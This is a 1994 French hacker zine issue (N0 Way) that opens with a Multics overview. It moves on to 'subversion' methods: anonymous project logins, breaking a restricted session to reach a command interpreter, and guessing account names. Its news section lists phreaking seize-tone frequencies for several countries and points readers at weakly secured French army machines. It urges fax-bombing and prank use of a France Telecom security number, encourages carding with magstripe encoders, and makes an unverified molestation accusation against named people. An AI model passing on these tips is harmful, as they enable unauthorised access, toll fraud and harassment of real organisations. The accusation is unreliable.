$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$
|
|||
|
$$ $$
|
|||
|
$$ Multics par NeurAlien $$
|
|||
|
$$ $$
|
|||
|
$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$<24>$
|
|||
|
|
|||
|
|
|||
|
Multics est encore un de ces OS depasses, vieux, obsoletes mais encore
|
|||
|
vivant sur quelques coins retires, hameaux eloignes et ruraux de la
|
|||
|
technopolis galopante que sont actuellement nos grands centre informatiques.
|
|||
|
Les derniers Multics dont j'ai eu connaissance etaient a l'Universite de
|
|||
|
Calgary au Canada, l'INRIA de Rocquencourt en France, Le CIRIL en France qui
|
|||
|
a ete remplace lors de l'ete 1991 par un HP9000 et le CICT toujours en France.
|
|||
|
(et puis aussi: Le ministere de la Culture et l'INRA.)
|
|||
|
Multics est la source d'Unix. C'est un peu comme le pere d'Unix.
|
|||
|
C'est un systeme tres lourds a gerer mais d'un efficacite, d'une fiabilite,
|
|||
|
d'une organisation et d'une praticite telle que l'on se demande pourquoi
|
|||
|
cet OS disparait. En effet, cet OS est certainnement un des meilleurs OS
|
|||
|
developpe jusqu'a maintenant. La derniere version de Multics dont j'ai ete
|
|||
|
temoins est la 12.0 je crois.
|
|||
|
|
|||
|
Le systeme est tres vaste donc ce texte ne sera qu'une presentation de
|
|||
|
Multics.
|
|||
|
|
|||
|
1 Reconnaitre un Multics:
|
|||
|
------------------------
|
|||
|
Au login, la pluspart du temps, quand on se connecte sur un Multics, il
|
|||
|
affiche:
|
|||
|
<system> MULTICS version MRxx # o<> xx est le numero de la version
|
|||
|
Channel dhyyy at hhmm.s # yyy : canal de communication
|
|||
|
# hhmm.s : heure format militaire
|
|||
|
up since hhmm.s # date du dernier boot.
|
|||
|
quelques autres informations et puis plus rien:
|
|||
|
c'est la periode de prelogin.
|
|||
|
|
|||
|
1.1 Prelogin:
|
|||
|
------------
|
|||
|
Si vous connaissez les Cyber de Control Data Corporation comme les CDC960,
|
|||
|
CDC980 etc... Ils sont sous NOS/VE et ont comme pour le Multics, une periode
|
|||
|
de prelogin.
|
|||
|
Celle ci est generalement limitee (environ a 2mn).
|
|||
|
Le prelogin comporte plusieurs commandes primaires sous Multics:
|
|||
|
help
|
|||
|
l
|
|||
|
et d'autres commandes de login anonyme sous un projet.
|
|||
|
|
|||
|
En effet, la gestion des utilisateurs sous MULTICS se fait par projet.
|
|||
|
Il y a un responsable de projet qui dirige un groupe d'utilisateurs au point
|
|||
|
de vue gestion. On designe un compte comme cela:
|
|||
|
<Username>.<PROJECT>
|
|||
|
Ainsi, lors du login, on peut soit taper le nom en entier, soit taper juste
|
|||
|
le <Username>. Dans le dernier cas, le programme de login va detecter a quel
|
|||
|
projet appartient cet utilisateur.
|
|||
|
|
|||
|
Une fonction interessante est la fonction de login anonyme.
|
|||
|
En connaissant juste le nom d'un projet, on peut se logger anonymement sous ce
|
|||
|
projet.
|
|||
|
La syntaxe de cette commande est donnee au prelogin par le message de la
|
|||
|
commande help.
|
|||
|
|
|||
|
1.2 Les principes:
|
|||
|
-----------------
|
|||
|
* Un utilisateur a toujours un nom qui commence par une majuscule. Ce compte
|
|||
|
fait toujours partie d'un groupe appele 'projet'. On peut donc se logger
|
|||
|
anonymement sous un projet sans avoir de nom de compte. On sera donc
|
|||
|
identifie comme anonyme du projet xxxxx.
|
|||
|
Un user peut faire partie de plusieurs projets.
|
|||
|
* Le nom du projet xxxxx doit avoir pour premiere lettre une majuscule.
|
|||
|
* Un 'segment' est le nom donne sous multics aux fichiers.
|
|||
|
* un chemin est indique non pas avec des slash ('/') comme sous unix mais
|
|||
|
avec des signes superieur: '>'
|
|||
|
ex: >udd>PROJET>User
|
|||
|
* le directory >udd> est le directory qui contient toutes les infos concernant
|
|||
|
le utilisateurs.
|
|||
|
* Se deplacer dans l'arborescence:
|
|||
|
Si l'on est dans le directory: '>udd>PROJET1' et que l'on veut aller dans
|
|||
|
'>udd', il suffit te taper 'cwd <'.
|
|||
|
Si l'on est dans '>udd>PROJET1' et que l'on veut aller dans
|
|||
|
'>udd>PROJET2>user1', il faut taper:
|
|||
|
cwd <user1
|
|||
|
* Dans la logique Multics, < equivaut a .. sous Unix et sous DOS (peurk...
|
|||
|
je parle encore de cet OS pourri, le DOS.... bouhhh)
|
|||
|
|
|||
|
1.3 Les commandes:
|
|||
|
-----------------
|
|||
|
Voici une liste simple et absolument non exhaustive des commandes de multics;
|
|||
|
ce sont les principales.
|
|||
|
help <topic> : aide en ligne
|
|||
|
ls : liste des fichiers sur directory courant
|
|||
|
cwd <path> : pwd afficher le nom du directory courant
|
|||
|
cd <newpath> : creer un nouveau directory dans le directory courant
|
|||
|
dl <sedgment> : effacer un segment
|
|||
|
who : affiche un court message sur l'etat de la machine et affiche
|
|||
|
la liste des users actuellements connectes sur la machine.
|
|||
|
whom : meme chose mais en classant les utilisateurs par projets.
|
|||
|
sm : envoyer un message a un utilisateur online (equivalent a
|
|||
|
write sous unix).
|
|||
|
sdm : envoyer un courrier a un utilisateur.
|
|||
|
Si la machine est connectee a un reseau comme Internet,
|
|||
|
pour envoyer un mail a scc@nic.ddn.mil, il faut taper:
|
|||
|
sdm scc -at nic.ddn.mil
|
|||
|
rdm : lire sa boite aux lettres.
|
|||
|
memo : systeme d'agenda tres evolue.
|
|||
|
pr : affiche un segment a l'ecran.
|
|||
|
ted : editeur ligne a ligne type ED.
|
|||
|
emacs : editeur pleine page que vous connaissez.
|
|||
|
l'utilisation de cet editeur est impossible avec une
|
|||
|
liaison 7 bits. Il faut une liaison 8 bit pour utiliser ca!
|
|||
|
basic : appel du compilateur basic.
|
|||
|
pascal : appel du compilateur pascal.
|
|||
|
calendar : affichage de calendrier.
|
|||
|
date : affiche la date.
|
|||
|
time : affiche l'heure.
|
|||
|
st <filename> : affiche le statut d'un segment ou d'un directory.
|
|||
|
la : liste des droits d'acces sur un segment ou un directory.
|
|||
|
sa : etablit les droits d'acces sur un segment ou un directory.
|
|||
|
logout : quitter Multics.
|
|||
|
crossnet : envoyer du mail a travers differents r<>seaux.
|
|||
|
|
|||
|
2 Subversion:
|
|||
|
------------
|
|||
|
Par la methode de login anonymous, nous pouvont subvertir MULTICS en
|
|||
|
reperant par un acces public qui est sous un certain projet.
|
|||
|
Par exemple, pour l'interogation d'une bibliotheque ou d'un guide approfondi,
|
|||
|
MULTICS affiche en debut de connexion des infos dont le projet.
|
|||
|
Il suffit ensuite de faire un login anonyme sur ce projet.
|
|||
|
|
|||
|
Deuxieme methode.
|
|||
|
Lors d'une connexion dirigee comme decrite precedemment, il faut stopper le
|
|||
|
programme.
|
|||
|
Pour cela on utilisera CONTROL+Z ou CONTROL+Q ou CONTROL+S ou CONTROL+D
|
|||
|
ou CONTROL+D ou tout simplement un BREAK ou si vous avez un ATTN.
|
|||
|
Ensuite, par la commande 'pi', on peut recuperer un interpreteur de commande.
|
|||
|
|
|||
|
Methode traditionnelle:
|
|||
|
Eh bien, ca vous connaissez... TRY !!!! (in harlem brown.... ;-) private joke)
|
|||
|
N'oubliez jamais que le permier caractere de Username doit toujours etre en
|
|||
|
majuscule. Essayez les entrees communes.
|
|||
|
ex: SysDaemon (celui ci, je l'ai jamais vu 'open')
|
|||
|
|
|||
|
3 Then... the end:
|
|||
|
-----------------
|
|||
|
Bon, j'avoue que ce texte est laconique mais ce systeme est tellement complet
|
|||
|
et tellement peu repandu, que ce serait de la perte de temps de vous expliquer
|
|||
|
tout si vous n'avez pas de becanne pour tester.
|
|||
|
|
|||
|
So long HPC[A]s men.
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.18
|
|||
|
|
|||
|
|
|||
|
:) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
|
|||
|
?) Tel - Trixx |)
|
|||
|
@) By %)
|
|||
|
B) NeurAlien I)
|
|||
|
:) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
|
|||
|
|
|||
|
-
|
|||
|
7 Septembre 1994
|
|||
|
-
|
|||
|
"A new race of hacker seems to be born, Ultimate Hackers" --Anonymous
|
|||
|
|
|||
|
|
|||
|
Hohe les Hack/phreakERS, les telcos <20>voluent et nous aussi. En exclusivit<69>
|
|||
|
quelques news d'un peu partout dans le monde qui vont vous faire sauter au
|
|||
|
plafond.
|
|||
|
|
|||
|
Tout d'abord la HOPE (Hacking On Planet Earth) s'est d<>roul<75>e dans le chaos le
|
|||
|
plus complet. Il y avait beaucoup de "well known hackers" et quelques
|
|||
|
<EFBFBD>vennements interressants s'y sont d<>roul<75>s.
|
|||
|
(Knight Lightning & Taran King molestent (tentent tout au moins) une fille
|
|||
|
pendant qu'ils discutent avec Win Schwartau et Agent Steal)
|
|||
|
L'unix mis a disposition des participant a <20>t<EFBFBD> hack<63> comme on pouvait s'y
|
|||
|
attendre.
|
|||
|
("Hey Razor, have a look at them... It could help...
|
|||
|
- Why?? I haven't been hacked... No... NOOOOOOOOOO... NOoOOoOooOoOO!!! You
|
|||
|
hacked my system?")
|
|||
|
Le nouveau systeme du m<>tro de new york qui constituait le deuxi<78>me d<>fi aux
|
|||
|
hackers a lui aussi <20>t<EFBFBD> vaicu. Il paraitrait (je ne l'ai pas vu) que la
|
|||
|
personne l'ayant hack<63> soit actuellement recherch<63>e. :)
|
|||
|
(Fucking Pigz, GET A LIFE ! )
|
|||
|
|
|||
|
Au niveau des * Boxes, ca a fonctionn<6E> dur apparemment dans une folie
|
|||
|
d<EFBFBD>moniaque. Certains pays semblent avoir <20>t<EFBFBD> ouverts et une effervescence chez
|
|||
|
les phone phreaks semble confirmer les bruits de grands "breakthrough" en
|
|||
|
mati<EFBFBD>re de phreaking. (R2 etc...)
|
|||
|
|
|||
|
Le X25 semblait mort, SevenUp nous dit le contraire: plusieurs centaines
|
|||
|
d'appels par semaine sur SecTec. La nostalgie des anciens fait toujours peur
|
|||
|
aux admins pour leur facture X25. (Hey Dale Drew, GET A LIFE !)
|
|||
|
|
|||
|
Allez, un ptit amuse gueule pour les lecteurs de N0 Way:
|
|||
|
Frequences pour la malaisie:
|
|||
|
Key Forward: 2600 + 2400 Hz : 150 ms
|
|||
|
Between: 2000 ms
|
|||
|
Seize: 2400 Hz : 150 ms
|
|||
|
Intervals: 150 ms
|
|||
|
|
|||
|
CCITT5:
|
|||
|
======
|
|||
|
Tiens, info de nos amis de Hollande j'ai nomme Hack-Tic:
|
|||
|
CCITT 5 serait utilis<69> au : Chili,
|
|||
|
Philippines
|
|||
|
South Africa
|
|||
|
Colombie
|
|||
|
Bresil
|
|||
|
Essayez pour voir si ca passe...
|
|||
|
|
|||
|
Bribes r<>colt<6C>es un peu partout:
|
|||
|
===============================
|
|||
|
Saviez vous que GN Navetel fournit <20> la gendarmerie Canadienne des solutions
|
|||
|
pour ecouter les transmissions de donn<6E>es et plus particulierement:
|
|||
|
- les comms modems sur les BBS jusqu'au vitesse 28800.
|
|||
|
- les comms satellites vers Taiwan & Singapour envoy<6F>es <20> 2Mbit/s aux
|
|||
|
satellites par des "emissaires" de ces pays.
|
|||
|
|
|||
|
Afrique du Sud:
|
|||
|
==============
|
|||
|
2400/2600 puis 2400
|
|||
|
Timings: 150/0/90/0 toujours en ms bien s<>r
|
|||
|
|
|||
|
Chili:
|
|||
|
=====
|
|||
|
2400 ou 2550 pendant 3 secondes
|
|||
|
seize: 2400 (ou 2460)
|
|||
|
|
|||
|
The recent hack:
|
|||
|
===============
|
|||
|
Net23 viens de se faire pirater. Net23 est un bon IP provider <20> New York.
|
|||
|
Son administrateur qui a juste 15 ans <20>tait plutot vert. Well... qu'est ce qui
|
|||
|
a pris aux hackers de lui modifier son kernel, de lui enlever netstat et ps?
|
|||
|
Bref... pas kewl pour lui.
|
|||
|
|
|||
|
R2:
|
|||
|
==
|
|||
|
Pour seize'r un trunk en R2, il faut envoyer:
|
|||
|
2040/2400 OU 2400/2400
|
|||
|
ou == ou
|
|||
|
2280 2280
|
|||
|
ou ou
|
|||
|
3000 3000
|
|||
|
|
|||
|
Nouvelles de l'arm<72>e:
|
|||
|
====================
|
|||
|
L'arm<72>e francaise a un beau reseau TCP/IP interne. C'est tres joli et c'est
|
|||
|
dur d'y acceder. Mais alors, c'est COMPLETEMENT NUL AU NIVEAU PROTECTION:
|
|||
|
des entrees avec root sans mot de passe!
|
|||
|
tftp actif sur toutes les machines !
|
|||
|
rexd en standard sur tous les HP.
|
|||
|
Vous voulez vous marrer, essayez de votre caserne pref<65>r<EFBFBD>e ! :)
|
|||
|
|
|||
|
Quelqu'un <20> faire chier:
|
|||
|
=======================
|
|||
|
Service de securit<69> de chez... FT:
|
|||
|
Tel: (1) 44 44 22 22
|
|||
|
Fax: (1) 42 68 19 38
|
|||
|
Vous avez mon approbation pour donner le 44 44 22 22 comme num<75>ro a v<>rifier
|
|||
|
pour les achats par carte bleue ou num<75>ro de rappel pour France Telecom pour
|
|||
|
les renseignements quand vous etes dans une cabine.
|
|||
|
Je suis aussi d'accord avec le fait que vous utilisiez votre fax modem pour
|
|||
|
envoyer 450 pages NOIRES au 42 68 19 38 !
|
|||
|
|
|||
|
La blague du jour:
|
|||
|
=================
|
|||
|
"Comment transforme t'on un 486 en un 8088?"
|
|||
|
"- En installant windows."
|
|||
|
[Kopyrite Phrack 46]
|
|||
|
|
|||
|
Mag stripe Reader / Coder:
|
|||
|
=========================
|
|||
|
Beaucoup de personnes recherches des lecteurs encodeurs de cartes magn<67>tiques.
|
|||
|
Voila ou les acheter...
|
|||
|
CPU ADvance
|
|||
|
Post Office Box 2434
|
|||
|
Harwood Station
|
|||
|
Littletown, MA 01460
|
|||
|
USA
|
|||
|
Fax: 508-624-4819
|
|||
|
|
|||
|
L'unit<69> coute 389 $ US et il y a 2 modeles:
|
|||
|
un lecteur pr les pistes ISO 1 & 2
|
|||
|
un autre pour les pistes ISO 2 & 3
|
|||
|
Hehe.... Bon carding...
|
|||
|
|
|||
|
N0 Way recrute:
|
|||
|
==============
|
|||
|
Si la nuit vous revez (a part les trucs crades) aux catas, aux reseaux, aux
|
|||
|
ordis, a la chasse aux inspecteurs, au trashing, a l'escalade des batiments de
|
|||
|
FT.
|
|||
|
Si votre oreiller est un Cisco 7000.
|
|||
|
Si vous avez chez vous une antenne parabolique de 4 m de diametre motorisee
|
|||
|
pour suivre les satellites de l'armee.
|
|||
|
Si vous ne vous servez que d'une socket en raw IP pour faire du RPC.
|
|||
|
Si vous vous servez de votre cafetiere pour faire des pates au caf<61> ;).
|
|||
|
Si vous aimez router vous memes vos paquets en Source Routing.
|
|||
|
Si vous etes n<> dans une <20>prouvette de LSD 25.
|
|||
|
|
|||
|
Alors nous avons besoin de vous pour ecrire des article dans N0 Way sur les
|
|||
|
trucs les plus d<>lirant, les plus techniques et les plus <20>clatants.
|
|||
|
|
|||
|
! Have phun wif that ! ++NeurAlien
|
|||
|
|
|||
|
On to the next one, on to the next one ! ! ! ++N.
|